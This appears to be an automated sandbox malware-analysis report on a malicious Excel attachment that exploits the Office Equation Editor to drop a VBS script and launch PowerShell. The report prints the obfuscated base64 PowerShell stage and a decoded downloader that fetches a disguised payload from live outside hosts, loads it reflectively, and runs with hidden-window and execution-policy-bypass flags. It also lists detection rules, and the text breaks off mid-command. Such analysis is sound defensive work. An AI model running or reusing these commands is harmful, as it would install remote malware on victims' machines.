Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SHREE GANESH BOOK SERVICES-347274.xls

Overview

General Information

Sample name:SHREE GANESH BOOK SERVICES-347274.xls
Analysis ID:1391949
MD5:23692e9e905328ad3c5dd2de8e259e52
SHA1:bdcd5bb9145ddefe14b022bc6a7adf04399fc0d4
SHA256:eab6d377a098bda79f6fd32c89b15e9dee1c29981973e8221a13abe63d798006
Tags:xls
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
System process connects to network (likely due to code injection or exploit)
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Microsoft Office drops suspicious files
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1892 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 2596 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3192 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3248 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3476 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreSDgTreBHDgTreFUDgTreUwDgTrevDgTreDYDgTreNgDgTre1DgTreDMDgTreLwDgTre2DgTreDkDgTreLgDgTre0DgTreDQDgTreMgDgTreuDgTreDIDgTreOQDgTreuDgTreDEDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreUwBVDgTreFUDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3636 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} } MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • AcroRd32.exe (PID: 3744 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
      • RdrCEF.exe (PID: 4016 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\310E1AAE.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1500:$obj2: \objdata
  • 0x14ea:$obj3: \objupdate
  • 0x14c5:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1500:$obj2: \objdata
  • 0x14ea:$obj3: \objupdate
  • 0x14c5:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3476INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xefce7:$b2: ::FromBase64String(
  • 0x138acf:$b2: ::FromBase64String(
  • 0x13943f:$b2: ::FromBase64String(
  • 0x13a4e4:$b2: ::FromBase64String(
  • 0x13aaef:$b2: ::FromBase64String(
  • 0x13b290:$b2: ::FromBase64String(
  • 0x13b81a:$b2: ::FromBase64String(
  • 0x181589:$b2: ::FromBase64String(
  • 0xefb4c:$b3: ::UTF8.GetString(
  • 0x138934:$b3: ::UTF8.GetString(
  • 0x1392a4:$b3: ::UTF8.GetString(
  • 0x13a349:$b3: ::UTF8.GetString(
  • 0x13a954:$b3: ::UTF8.GetString(
  • 0x13b0f5:$b3: ::UTF8.GetString(
  • 0x13b67f:$b3: ::UTF8.GetString(
  • 0x8710f:$s1: -join
  • 0x975b3:$s1: -join
  • 0x50e99:$s3: reverse
  • 0x5c8a6:$s3: reverse
  • 0xaae36:$s3: reverse
  • 0xac4b5:$s3: reverse
Process Memory Space: powershell.exe PID: 3636INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x3c95:$b2: ::FromBase64String(
  • 0x81c1:$b2: ::FromBase64String(
  • 0x8746:$b2: ::FromBase64String(
  • 0x8ed2:$b2: ::FromBase64String(
  • 0x9618:$b2: ::FromBase64String(
  • 0x1ddc5:$b2: ::FromBase64String(
  • 0x1eb23:$b2: ::FromBase64String(
  • 0x59deda:$b2: ::FromBase64String(
  • 0x59e459:$b2: ::FromBase64String(
  • 0x59f62a:$b2: ::FromBase64String(
  • 0xad77f6:$b2: ::FromBase64String(
  • 0xb2b1c1:$b2: ::FromBase64String(
  • 0xc06ead:$b2: ::FromBase64String(
  • 0xc0749c:$b2: ::FromBase64String(
  • 0xc0a1dd:$b2: ::FromBase64String(
  • 0xc0a75b:$b2: ::FromBase64String(
  • 0xe10527:$b2: ::FromBase64String(
  • 0xf073f7:$b2: ::FromBase64String(
  • 0xfb3619:$b2: ::FromBase64String(
  • 0xfb3b97:$b2: ::FromBase64String(
  • 0xfd3415:$b2: ::FromBase64String(

Sigma Signatures

Exploits

barindex
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 91.92.244.96, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
Sigma detected: File Dropped By EQNEDT32EXE
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\loverhappy[1].vbs

Spreading

barindex
Sigma detected: Powershell download payload from hardcoded c2 list
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGUS/6653/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'SUU','RegAsm',''))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\S

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0D